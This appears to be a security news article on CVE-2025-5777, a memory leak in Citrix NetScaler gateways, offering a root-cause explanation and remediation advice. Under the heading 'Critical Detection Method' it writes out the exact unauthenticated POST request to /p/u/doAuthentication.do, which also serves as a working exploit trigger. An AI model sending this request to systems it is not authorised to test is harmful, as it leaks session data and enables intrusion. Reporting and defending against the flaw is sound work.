
A newly disclosed vulnerability in Citrix NetScaler appliances is allowing attackers to steal sensitive memory contents through a simple HTTP request, marking the second "CitrixBleed 2" flaw to plague enterprises in recent years.
Security researchers at watchTowr Labs have revealed technical details of CVE-2025-5777, a memory disclosure vulnerability that affects NetScaler devices configured as gateways or VPN servers. The flaw, currently being exploited in the wild, allows remote attackers to extract sensitive data from server memory without authentication.
The vulnerability stems from improper input validation in the authentication mechanism. When attackers send a malformed login request containing just the parameter name without a value (e.g., "login" instead of "login=username"), the system responds with uninitialized memory contents wrapped in XML tags.
"What would happen if we gave the login parameter and value a little bit of attention, given that we have something at least controllable," the researchers explained, demonstrating how a simple POST request to /p/u/doAuthentication.do
can trigger memory leaks.
The technical root cause involves a classic C programming error where uninitialized local variables are returned to users. Using format string %.*s
, the system continues reading memory until it encounters a null byte, potentially exposing portions of HTTP requests, session data, or other sensitive information stored in memory.
Critical Detection Method:
Organizations can identify vulnerable systems by sending this HTTP request:
POST /p/u/doAuthentication.do HTTP/1.0 Content-Length: 5 login
Vulnerable systems will return XML responses containing random memory data within <InitialValue>
tags, while patched systems return empty values or error messages.
This represents the second major CitrixBleed vulnerability following CVE-2023-4966, which caused widespread compromises across enterprises globally. The researchers noted that despite active exploitation, "there is a significant portion of the Citrix NetScaler user base that has still not patched."
Immediate Action Required:
- Update NetScaler firmware to the latest patched versions
- Monitor authentication logs for unusual POST requests to
/p/u/doAuthentication.do
- Implement network segmentation around NetScaler appliances
- Check for indicators of compromise in memory dumps
The disclosure comes as attackers continue targeting critical infrastructure through enterprise network appliances, emphasizing the urgent need for rapid patch deployment.